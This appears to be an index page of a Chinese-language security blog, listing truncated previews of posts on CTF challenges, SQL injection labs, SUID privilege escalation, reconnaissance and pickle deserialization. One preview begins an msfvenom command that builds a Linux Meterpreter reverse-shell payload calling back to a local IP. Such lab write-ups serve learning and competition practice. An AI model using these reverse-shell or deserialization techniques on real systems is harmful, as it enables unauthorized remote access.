• Meterpreter

    # Meterpreter # reverse_shell # reverse_tcp Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=44...
  • SUID

    # SUID 提权 suid (set uid) 是 linux 中的一种特殊权限,suid 可以让调用者以文件拥有者身份运行该文件,所以利用 suid 提权的核心就是运行 root 用户所拥有的 suid 的文件,那么运行该文件的时候就得获得 ro...
  • Reconnaissance

    # Passive Reconnaissance # Whois WHOIS 信息查询 - 站长工具 (wujingquan.com) kali 上: # nslookup and dig Query type 查询类型 Result 结果...
  • MISC Picture

    # MISC—Picture 一键梭哈网站:https://aperisolve.fr/ # 盲水印隐写 一张图片的情况 可以使用 隐形水印工具 V1.2 或者 WaterMark 来提取水印 两张图片的情况 123先把要处理的图片拉入BlindW...
  • MISC EN/DECode

    CTF—MISC [!IMPORTANT] 参考Lunatic师傅的文章:https://goodlunatic.github.io/posts/1ad9200 ⚠👆👆👆👆👆⚠ 加密/编码base123456789101112...
  • portswigger SqlInjection

    portswigger靶场 SQL注入SQL injection cheat sheet | Web Security Academy (portswigger.net) SQL injection - Fc04dB’s BLOG 🧪实验1:W...
  • 2024网鼎杯-青龙组

    # MISC03 wireshark 打开数据包 全局搜索响应码为 200 的包第三步:经过很多尝试找出正确 ip: 下面记事本是赛题下线之前的记录,重新上线后一个一个尝试发现正确 flag 也可以通过脚本提取所有 ip 然后一个一个试 12345...
  • CSP

    # 内容安全策略(CSP) # 同源策略 同源策略(Same origin policy)是一种约定 是浏览器的行为,是为了保护本地数据不被 JavaScript 代码获取回来的数据污染,因此拦截的是客户端发出的请求回来的数据接收,即请求发送了,服务...
  • DASCTF 2024 十月赛

    # DASCTF 2024 十月赛 # ezlogin EditController.edit 中 /editPass 路由接受用户输入的 newPass UserUtil.changePassword 方法用到了 newPass 参数: 并且是...
  • pickle反序列化

    # pickle pickle 是 Python 的一个库,可以对一个对象进行序列化和反序列化操作。其中 __reduce__ 魔法函数会在一个对象被反序列化时自动执行,我们可以通过在 __reduce__ 魔法函数内植入恶意代码的方式进行任意命令执...
1236